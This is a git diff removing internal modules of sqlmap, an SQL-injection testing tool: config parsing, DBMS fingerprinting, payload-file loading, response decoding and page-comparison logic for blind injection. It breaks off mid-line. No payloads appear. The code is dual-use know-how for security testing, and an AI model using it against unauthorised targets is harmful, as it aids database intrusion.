+0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import checkFile -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import openFile -from lib.core.common import unArrayizeValue -from lib.core.common import UnicodeRawConfigParser -from lib.core.data import cmdLineOptions -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapSyntaxException -from lib.core.optiondict import optDict - -config = None - -def configFileProxy(section, option, boolean=False, integer=False): - """ - Parse configuration file and save settings into the configuration - advanced dictionary. - """ - - global config - - if config.has_option(section, option): - try: - if boolean: - value = config.getboolean(section, option) if config.get(section, option) else False - elif integer: - value = config.getint(section, option) if config.get(section, option) else 0 - else: - value = config.get(section, option) - except ValueError, ex: - errMsg = "error occurred while processing the option " - errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex)) - raise SqlmapSyntaxException(errMsg) - - if value: - conf[option] = value - else: - conf[option] = None - else: - debugMsg = "missing requested option '%s' (section " % option - debugMsg += "'%s') into the configuration file, " % section - debugMsg += "ignoring. Skipping to next." - logger.debug(debugMsg) - -def configFileParser(configFile): - """ - Parse configuration file and save settings into the configuration - advanced dictionary. - """ - - global config - - debugMsg = "parsing configuration file" - logger.debug(debugMsg) - - checkFile(configFile) - configFP = openFile(configFile, "rb") - - try: - config = UnicodeRawConfigParser() - config.readfp(configFP) - except Exception, ex: - errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex) - raise SqlmapSyntaxException(errMsg) - - if not config.has_section("Target"): - errMsg = "missing a mandatory section 'Target' in the configuration file" - raise SqlmapMissingMandatoryOptionException(errMsg) - - mandatory = False - - for option in ("direct", "url", "logFile", "bulkFile", "googleDork", "requestFile", "sitemapUrl", "wizard"): - if config.has_option("Target", option) and config.get("Target", option) or cmdLineOptions.get(option): - mandatory = True - break - - if not mandatory: - errMsg = "missing a mandatory option in the configuration file " - errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile, sitemapUrl or wizard)" - raise SqlmapMissingMandatoryOptionException(errMsg) - - for family, optionData in optDict.items(): - for option, datatype in optionData.items(): - datatype = unArrayizeValue(datatype) - - boolean = datatype == "boolean" - integer = datatype == "integer" - - configFileProxy(family, option, boolean, integer) diff --git a/lib/parse/handler.py b/lib/parse/handler.py deleted file mode 100644 index f7970465..00000000 --- a/lib/parse/handler.py +++ /dev/null @@ -1,78 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from xml.sax.handler import ContentHandler -from lib.core.common import sanitizeStr - -class FingerprintHandler(ContentHandler): - """ - This class defines methods to parse and extract information from - the given DBMS banner based upon the data in XML file - """ - - def __init__(self, banner, info): - ContentHandler.__init__(self) - - self._banner = sanitizeStr(banner) - self._regexp = None - self._match = None - self._dbmsVersion = None - self._techVersion = None - self._info = info - - def _feedInfo(self, key, value): - value = sanitizeStr(value) - - if value in (None, "None"): - return - - if key == "dbmsVersion": - self._info[key] = value - else: - if key not in self._info.keys(): - self._info[key] = set() - - for _ in value.split("|"): - self._info[key].add(_) - - def startElement(self, name, attrs): - if name == "regexp": - self._regexp = sanitizeStr(attrs.get("value")) - _ = re.match("\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes - - if _ and _.group(0).lower() in self._banner.lower() or not _: - self._match = re.search(self._regexp, self._banner, re.I | re.M) - else: - self._match = None - - if name == "info" and self._match: - self._feedInfo("type", attrs.get("type")) - self._feedInfo("distrib", attrs.get("distrib")) - self._feedInfo("release", attrs.get("release")) - self._feedInfo("codename", attrs.get("codename")) - - self._dbmsVersion = sanitizeStr(attrs.get("dbms_version")) - self._techVersion = sanitizeStr(attrs.get("tech_version")) - self._sp = sanitizeStr(attrs.get("sp")) - - if self._dbmsVersion.isdigit(): - self._feedInfo("dbmsVersion", self._match.group(int(self._dbmsVersion))) - - if self._techVersion.isdigit(): - self._feedInfo("technology", "%s %s" % (attrs.get("technology"), self._match.group(int(self._techVersion)))) - else: - self._feedInfo("technology", attrs.get("technology")) - - if self._sp.isdigit(): - self._feedInfo("sp", "Service Pack %s" % int(self._sp)) - - self._regexp = None - self._match = None - self._dbmsVersion = None - self._techVersion = None diff --git a/lib/parse/headers.py b/lib/parse/headers.py deleted file mode 100644 index efc55156..00000000 --- a/lib/parse/headers.py +++ /dev/null @@ -1,42 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import itertools -import os - -from lib.core.common import parseXmlFile -from lib.core.data import kb -from lib.core.data import paths -from lib.parse.handler import FingerprintHandler - - -def headersParser(headers): - """ - This function calls a class that parses the input HTTP headers to - fingerprint the back-end database management system operating system - and the web application technology - """ - - if not kb.headerPaths: - kb.headerPaths = { - "cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"), - "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"), - "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), - "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"), - "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"), - "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), - "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), - } - - for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers): - value = headers[header] - xmlfile = kb.headerPaths[header] - - handler = FingerprintHandler(value, kb.headersFp) - - parseXmlFile(xmlfile, handler) - parseXmlFile(paths.GENERIC_XML, handler) diff --git a/lib/parse/html.py b/lib/parse/html.py deleted file mode 100644 index 92dad38b..00000000 --- a/lib/parse/html.py +++ /dev/null @@ -1,65 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from xml.sax.handler import ContentHandler - -from lib.core.common import parseXmlFile -from lib.core.data import kb -from lib.core.data import paths -from lib.core.threads import getCurrentThreadData - -class HTMLHandler(ContentHandler): - """ - This class defines methods to parse the input HTML page to - fingerprint the back-end database management system - """ - - def __init__(self, page): - ContentHandler.__init__(self) - - self._dbms = None - self._page = page - - self.dbms = None - - def _markAsErrorPage(self): - threadData = getCurrentThreadData() - threadData.lastErrorPage = (threadData.lastRequestUID, self._page) - - def startElement(self, name, attrs): - if name == "dbms": - self._dbms = attrs.get("value") - - elif name == "error": - if re.search(attrs.get("regexp"), self._page, re.I): - self.dbms = self._dbms - self._markAsErrorPage() - -def htmlParser(page): - """ - This function calls a class that parses the input HTML page to - fingerprint the back-end database management system - """ - - xmlfile = paths.ERRORS_XML - handler = HTMLHandler(page) - - parseXmlFile(xmlfile, handler) - - if handler.dbms and handler.dbms not in kb.htmlFp: - kb.lastParserStatus = handler.dbms - kb.htmlFp.append(handler.dbms) - else: - kb.lastParserStatus = None - - # generic SQL warning/error messages - if re.search(r"SQL (warning|error|syntax)", page, re.I): - handler._markAsErrorPage() - - return handler.dbms diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py deleted file mode 100644 index a453d7d6..00000000 --- a/lib/parse/payloads.py +++ /dev/null @@ -1,101 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from xml.etree import ElementTree as et - -from lib.core.common import getSafeExString -from lib.core.data import conf -from lib.core.data import paths -from lib.core.datatype import AttribDict -from lib.core.exception import SqlmapInstallationException - -def cleanupVals(text, tag): - if tag in ("clause", "where"): - text = text.split(',') - - if isinstance(text, basestring): - text = int(text) if text.isdigit() else text - - elif isinstance(text, list): - count = 0 - - for _ in text: - text[count] = int(_) if _.isdigit() else _ - count += 1 - - if len(text) == 1 and tag not in ("clause", "where"): - text = text[0] - - return text - -def parseXmlNode(node): - for element in node.getiterator('boundary'): - boundary = AttribDict() - - for child in element.getchildren(): - if child.text: - values = cleanupVals(child.text, child.tag) - boundary[child.tag] = values - else: - boundary[child.tag] = None - - conf.boundaries.append(boundary) - - for element in node.getiterator('test'): - test = AttribDict() - - for child in element.getchildren(): - if child.text and child.text.strip(): - values = cleanupVals(child.text, child.tag) - test[child.tag] = values - else: - if len(child.getchildren()) == 0: - test[child.tag] = None - continue - else: - test[child.tag] = AttribDict() - - for gchild in child.getchildren(): - if gchild.tag in test[child.tag]: - prevtext = test[child.tag][gchild.tag] - test[child.tag][gchild.tag] = [prevtext, gchild.text] - else: - test[child.tag][gchild.tag] = gchild.text - - conf.tests.append(test) - -def loadBoundaries(): - try: - doc = et.parse(paths.BOUNDARIES_XML) - except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - - root = doc.getroot() - parseXmlNode(root) - -def loadPayloads(): - payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH) - payloadFiles.sort() - - for payloadFile in payloadFiles: - payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile) - - try: - doc = et.parse(payloadFilePath) - except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - - root = doc.getroot() - parseXmlNode(root) diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py deleted file mode 100644 index 237d28f2..00000000 --- a/lib/parse/sitemap.py +++ /dev/null @@ -1,57 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import httplib -import re - -from lib.core.common import readInput -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapSyntaxException -from lib.request.connect import Connect as Request -from thirdparty.oset.pyoset import oset - -abortedFlag = None - -def parseSitemap(url, retVal=None): - global abortedFlag - - if retVal is not None: - logger.debug("parsing sitemap '%s'" % url) - - try: - if retVal is None: - abortedFlag = False - retVal = oset() - - try: - content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" - except httplib.InvalidURL: - errMsg = "invalid URL given for sitemap ('%s')" % url - raise SqlmapSyntaxException, errMsg - - for match in re.finditer(r"\s*([^<]+)", content or ""): - if abortedFlag: - break - url = match.group(1).strip() - if url.endswith(".xml") and "sitemap" in url.lower(): - if kb.followSitemapRecursion is None: - message = "sitemap recursion detected. Do you want to follow? [y/N] " - test = readInput(message, default="N") - kb.followSitemapRecursion = test[0] in ("y", "Y") - if kb.followSitemapRecursion: - parseSitemap(url, retVal) - else: - retVal.add(url) - - except KeyboardInterrupt: - abortedFlag = True - warnMsg = "user aborted during sitemap parsing. sqlmap " - warnMsg += "will use partial list" - logger.warn(warnMsg) - - return retVal diff --git a/lib/request/__init__.py b/lib/request/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/request/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/request/basic.py b/lib/request/basic.py deleted file mode 100644 index 0c2557f6..00000000 --- a/lib/request/basic.py +++ /dev/null @@ -1,352 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import gzip -import logging -import re -import StringIO -import struct -import zlib - -from lib.core.common import extractErrorMessage -from lib.core.common import extractRegexResult -from lib.core.common import getPublicTypeMembers -from lib.core.common import getUnicode -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import resetCookieJar -from lib.core.common import singleTimeLogMessage -from lib.core.common import singleTimeWarnMessage -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import HTTP_HEADER -from lib.core.enums import PLACE -from lib.core.exception import SqlmapCompressionException -from lib.core.settings import BLOCKED_IP_REGEX -from lib.core.settings import DEFAULT_COOKIE_DELIMITER -from lib.core.settings import EVENTVALIDATION_REGEX -from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE -from lib.core.settings import META_CHARSET_REGEX -from lib.core.settings import PARSE_HEADERS_LIMIT -from lib.core.settings import UNICODE_ENCODING -from lib.core.settings import VIEWSTATE_REGEX -from lib.parse.headers import headersParser -from lib.parse.html import htmlParser -from lib.utils.htmlentities import htmlEntities -from thirdparty.chardet import detect -from thirdparty.odict.odict import OrderedDict - -def forgeHeaders(items=None): - """ - Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing - the HTTP requests - """ - - items = items or {} - - for _ in items.keys(): - if items[_] is None: - del items[_] - - headers = OrderedDict(conf.httpHeaders) - headers.update(items.items()) - - class _str(str): - def capitalize(self): - return _str(self) - - def title(self): - return _str(self) - - _ = headers - headers = OrderedDict() - for key, value in _.items(): - success = False - - for _ in headers: - if _.upper() == key.upper(): - del headers[_] - break - - if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)): - try: - headers[_str(key)] = value # dirty hack for http://bugs.python.org/issue12455 - except UnicodeEncodeError: # don't do the hack on non-ASCII header names (they have to be properly encoded later on) - pass - else: - success = True - if not success: - key = '-'.join(_.capitalize() for _ in key.split('-')) - headers[key] = value - - if conf.cj: - if HTTP_HEADER.COOKIE in headers: - for cookie in conf.cj: - if cookie.domain_specified and not conf.hostname.endswith(cookie.domain): - continue - - if ("%s=" % cookie.name) in headers[HTTP_HEADER.COOKIE]: - if conf.loadCookies: - conf.httpHeaders = filter(None, ((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders)) - elif kb.mergeCookies is None: - message = "you provided a HTTP %s header value. " % HTTP_HEADER.COOKIE - message += "The target URL provided its own cookies within " - message += "the HTTP %s header which intersect with yours. " % HTTP_HEADER.SET_COOKIE - message += "Do you want to merge them in futher requests? [Y/n] " - _ = readInput(message, default="Y") - kb.mergeCookies = not _ or _[0] in ("y", "Y") - - if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: - _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (cookie.name, getUnicode(cookie.value))).replace('\\', r'\\'), x) - headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) - - if PLACE.COOKIE in conf.parameters: - conf.parameters[PLACE.COOKIE] = _(conf.parameters[PLACE.COOKIE]) - - conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders] - - elif not kb.testMode: - headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value)) - - if kb.testMode and not any((conf.csrfToken, conf.safeUrl)): - resetCookieJar(conf.cj) - - return headers - -def parseResponse(page, headers): - """ - @param page: the page to parse to feed the knowledge base htmlFp - (back-end DBMS fingerprint based upon DBMS error messages return - through the web application) list and absFilePaths (absolute file - paths) set. - """ - - if headers: - headersParser(headers) - - if page: - htmlParser(page) - -def checkCharEncoding(encoding, warn=True): - """ - Checks encoding name, repairs common misspellings and adjusts to - proper namings used in codecs module - - >>> checkCharEncoding('iso-8858', False) - 'iso8859-1' - >>> checkCharEncoding('en_us', False) - 'utf8' - """ - - if encoding: - encoding = encoding.lower() - else: - return encoding - - # Reference: http://www.destructor.de/charsets/index.htm - translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"} - - for delimiter in (';', ',', '('): - if delimiter in encoding: - encoding = encoding[:encoding.find(delimiter)].strip() - - encoding = encoding.replace(""", "") - - # popular typos/errors - if "8858" in encoding: - encoding = encoding.replace("8858", "8859") # iso-8858 -> iso-8859 - elif "8559" in encoding: - encoding = encoding.replace("8559", "8859") # iso-8559 -> iso-8859 - elif "5889" in encoding: - encoding = encoding.replace("5889", "8859") # iso-5889 -> iso-8859 - elif "5589" in encoding: - encoding = encoding.replace("5589", "8859") # iso-5589 -> iso-8859 - elif "2313" in encoding: - encoding = encoding.replace("2313", "2312") # gb2313 -> gb2312 - elif encoding.startswith("x-"): - encoding = encoding[len("x-"):] # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish - elif "windows-cp" in encoding: - encoding = encoding.replace("windows-cp", "windows") # windows-cp-1254 -> windows-1254 - - # name adjustment for compatibility - if encoding.startswith("8859"): - encoding = "iso-%s" % encoding - elif encoding.startswith("cp-"): - encoding = "cp%s" % encoding[3:] - elif encoding.startswith("euc-"): - encoding = "euc_%s" % encoding[4:] - elif encoding.startswith("windows") and not encoding.startswith("windows-"): - encoding = "windows-%s" % encoding[7:] - elif encoding.find("iso-88") > 0: - encoding = encoding[encoding.find("iso-88"):] - elif encoding.startswith("is0-"): - encoding = "iso%s" % encoding[4:] - elif encoding.find("ascii") > 0: - encoding = "ascii" - elif encoding.find("utf8") > 0: - encoding = "utf8" - elif encoding.find("utf-8") > 0: - encoding = "utf-8" - - # Reference: http://philip.html5.org/data/charsets-2.html - if encoding in translate: - encoding = translate[encoding] - elif encoding in ("null", "{charset}", "*") or not re.search(r"\w", encoding): - return None - - # Reference: http://www.iana.org/assignments/character-sets - # Reference: http://docs.python.org/library/codecs.html - try: - codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding) - except (LookupError, ValueError): - if warn: - warnMsg = "unknown web page charset '%s'. " % encoding - warnMsg += "Please report by e-mail to 'dev@sqlmap.org'" - singleTimeLogMessage(warnMsg, logging.WARN, encoding) - encoding = None - - if encoding: - try: - unicode(randomStr(), encoding) - except: - if warn: - warnMsg = "invalid web page charset '%s'" % encoding - singleTimeLogMessage(warnMsg, logging.WARN, encoding) - encoding = None - - return encoding - -def getHeuristicCharEncoding(page): - """ - Returns page encoding charset detected by usage of heuristics - Reference: http://chardet.feedparser.org/docs/ - """ - retVal = detect(page)["encoding"] - - if retVal: - infoMsg = "heuristics detected web page charset '%s'" % retVal - singleTimeLogMessage(infoMsg, logging.INFO, retVal) - - return retVal - -def decodePage(page, contentEncoding, contentType): - """ - Decode compressed/charset HTTP response - """ - - if not page or (conf.nullConnection and len(page) < 2): - return getUnicode(page) - - if isinstance(contentEncoding, basestring) and contentEncoding.lower() in ("gzip", "x-gzip", "deflate"): - if not kb.pageCompress: - return None - - try: - if contentEncoding.lower() == "deflate": - data = StringIO.StringIO(zlib.decompress(page, -15)) # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations - else: - data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(page)) - size = struct.unpack(" MAX_CONNECTION_TOTAL_SIZE: - raise Exception("size too large") - - page = data.read() - except Exception, msg: - errMsg = "detected invalid data for declared content " - errMsg += "encoding '%s' ('%s')" % (contentEncoding, msg) - singleTimeLogMessage(errMsg, logging.ERROR) - - warnMsg = "turning off page compression" - singleTimeWarnMessage(warnMsg) - - kb.pageCompress = False - raise SqlmapCompressionException - - if not conf.charset: - httpCharset, metaCharset = None, None - - # Reference: http://stackoverflow.com/questions/1020892/python-urllib2-read-to-unicode - if contentType and (contentType.find("charset=") != -1): - httpCharset = checkCharEncoding(contentType.split("charset=")[-1]) - - metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page)) - - if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\ - or (httpCharset == metaCharset and all((httpCharset, metaCharset))): - kb.pageEncoding = httpCharset or metaCharset # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence - debugMsg = "declared web page charset '%s'" % kb.pageEncoding - singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg) - else: - kb.pageEncoding = None - else: - kb.pageEncoding = conf.charset - - # can't do for all responses because we need to support binary files too - if contentType and not isinstance(page, unicode) and "text/" in contentType.lower(): - if kb.heuristicMode: - kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page)) - page = getUnicode(page, kb.pageEncoding) - else: - # e.g. Ãëàâà - if "&#" in page: - page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page) - - # e.g. %20%28%29 - if "%" in page: - page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page) - - # e.g. & - page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page) - - kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page)) - page = getUnicode(page, kb.pageEncoding) - - # e.g. ’…™ - if "&#" in page: - def _(match): - retVal = match.group(0) - try: - retVal = unichr(int(match.group(1))) - except ValueError: - pass - return retVal - page = re.sub(r"&#(\d+);", _, page) - - # e.g. ζ - page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page) - - return page - -def processResponse(page, responseHeaders): - kb.processResponseCounter += 1 - - page = page or "" - - parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None) - - if conf.parseErrors: - msg = extractErrorMessage(page) - - if msg: - logger.warning("parsed DBMS error message: '%s'" % msg) - - if kb.originalPage is None: - for regex in (EVENTVALIDATION_REGEX, VIEWSTATE_REGEX): - match = re.search(regex, page) - if match and PLACE.POST in conf.parameters: - name, value = match.groups() - if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]: - if conf.paramDict[PLACE.POST][name] in page: - continue - conf.paramDict[PLACE.POST][name] = value - conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST]) - - if re.search(BLOCKED_IP_REGEX, page): - errMsg = "it appears that you have been blocked by the target server" - singleTimeLogMessage(errMsg, logging.ERROR) diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py deleted file mode 100644 index 89ec252b..00000000 --- a/lib/request/basicauthhandler.py +++ /dev/null @@ -1,39 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import urllib2 - -class SmartHTTPBasicAuthHandler(urllib2.HTTPBasicAuthHandler): - """ - Reference: http://selenic.com/hg/rev/6c51a5056020 - Fix for a: http://bugs.python.org/issue8797 - """ - def __init__(self, *args, **kwargs): - urllib2.HTTPBasicAuthHandler.__init__(self, *args, **kwargs) - self.retried_req = set() - self.retried_count = 0 - - def reset_retry_count(self): - # Python 2.6.5 will call this on 401 or 407 errors and thus loop - # forever. We disable reset_retry_count completely and reset in - # http_error_auth_reqed instead. - pass - - def http_error_auth_reqed(self, auth_header, host, req, headers): - # Reset the retry counter once for each request. - if hash(req) not in self.retried_req: - self.retried_req.add(hash(req)) - self.retried_count = 0 - else: - if self.retried_count > 5: - raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", - headers, None) - else: - self.retried_count += 1 - - return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed( - self, auth_header, host, req, headers) diff --git a/lib/request/comparison.py b/lib/request/comparison.py deleted file mode 100644 index baba2249..00000000 --- a/lib/request/comparison.py +++ /dev/null @@ -1,183 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import extractRegexResult -from lib.core.common import getFilteredPageContent -from lib.core.common import listToStrValue -from lib.core.common import removeDynamicContent -from lib.core.common import wasLastResponseDBMSError -from lib.core.common import wasLastResponseHTTPError -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapNoneDataException -from lib.core.settings import DEFAULT_PAGE_ENCODING -from lib.core.settings import DIFF_TOLERANCE -from lib.core.settings import HTML_TITLE_REGEX -from lib.core.settings import MIN_RATIO -from lib.core.settings import MAX_RATIO -from lib.core.settings import REFLECTED_VALUE_MARKER -from lib.core.settings import LOWER_RATIO_BOUND -from lib.core.settings import UPPER_RATIO_BOUND -from lib.core.threads import getCurrentThreadData - -def comparison(page, headers, code=None, getRatioValue=False, pageLength=None): - _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue) - return _ - -def _adjust(condition, getRatioValue): - if not any((conf.string, conf.notString, conf.regexp, conf.code)): - # Negative logic approach is used in raw page comparison scheme as that what is "different" than original - # PAYLOAD.WHERE.NEGATIVE response is considered as True; in switch based approach negative logic is not - # applied as that what is by user considered as True is that what is returned by the comparison mechanism - # itself - retVal = not condition if kb.negativeLogic and condition is not None and not getRatioValue else condition - else: - retVal = condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO) - - return retVal - -def _comparison(page, headers, code, getRatioValue, pageLength): - threadData = getCurrentThreadData() - - if kb.testMode: - threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else "" - threadData.lastComparisonPage = page - - if page is None and pageLength is None: - return None - - count = 0 - - seqMatcher = threadData.seqMatcher - seqMatcher.set_seq1(kb.pageTemplate) - - if any((conf.string, conf.notString, conf.regexp)): - rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page) - - # String to match in page when the query is True and/or valid - if conf.string: - return conf.string in rawResponse - - # String to match in page when the query is False and/or invalid - if conf.notString: - return conf.notString not in rawResponse - - # Regular expression to match in page when the query is True and/or valid - if conf.regexp: - return re.search(conf.regexp, rawResponse, re.I | re.M) is not None - - # HTTP code to match when the query is valid - if conf.code: - return conf.code == code - - if page: - # In case of an DBMS error page return None - if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic: - return None - - # Dynamic content lines to be excluded before comparison - if not kb.nullConnection: - page = removeDynamicContent(page) - seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate)) - - if not pageLength: - pageLength = len(page) - - if kb.nullConnection and pageLength: - if not seqMatcher.a: - errMsg = "problem occurred while retrieving original page content " - errMsg += "which prevents sqlmap from continuation. Please rerun, " - errMsg += "and if the problem persists turn off any optimization switches" - raise SqlmapNoneDataException(errMsg) - - ratio = 1. * pageLength / len(seqMatcher.a) - - if ratio > 1.: - ratio = 1. / ratio - else: - # Preventing "Unicode equal comparison failed to convert both arguments to Unicode" - # (e.g. if one page is PDF and the other is HTML) - if isinstance(seqMatcher.a, str) and isinstance(page, unicode): - page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') - elif isinstance(seqMatcher.a, unicode) and isinstance(page, str): - seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') - - seq1, seq2 = None, None - - if conf.titles: - seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) - seq2 = extractRegexResult(HTML_TITLE_REGEX, page) - else: - seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a - seq2 = getFilteredPageContent(page, True) if conf.textOnly else page - - if seq1 is None or seq2 is None: - return None - - seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") - seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") - - while count < min(len(seq1), len(seq2)): - if seq1[count] == seq2[count]: - count += 1 - else: - break - - if count: - try: - _seq1 = seq1[count:] - _seq2 = seq2[count:] - except MemoryError: - pass - else: - seq1 = _seq1 - seq2 = _seq2 - - while True: - try: - seqMatcher.set_seq1(seq1) - except MemoryError: - seq1 = seq1[:len(seq1) / 1024] - else: - break - - while True: - try: - seqMatcher.set_seq2(seq2) - except MemoryError: - seq2 = seq2[:len(seq2) / 1024] - else: - break - - ratio = round(seqMatcher.quick_ratio(), 3) - - # If the url is stable and we did not set yet the match ratio and the - # current injected value changes the url page content - if kb.matchRatio is None: - if (count or ratio >= LOWER_RATIO_BOUND) and ratio <= UPPER_RATIO_BOUND: - kb.matchRatio = ratio - logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio) - - # If it has been requested to return the ratio and not a comparison - # response - if getRatioValue: - return ratio - - elif ratio > UPPER_RATIO_BOUND: - return True - - elif ratio < LOWER_RATIO_BOUND: - return False - - elif kb.matchRatio is None: - return None - - else: - return (ratio - kb.matchRatio) > DIFF_TOLERANCE diff --git a/lib/request/connect.py b/lib/request/connect.py deleted file mode 100644 index c5d2eceb..00000000 --- a/lib/request/connect.py +++ /dev/null @@ -1,1146 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii -import compiler -import httplib -import json -import keyword -import logging -import re -import socket -import string -import struct -import time -import traceback -import urllib2 -import urlparse - -try: - import websocket - from websocket import WebSocketException -except ImportError: - class WebSocketException(Exception): - pass - -from 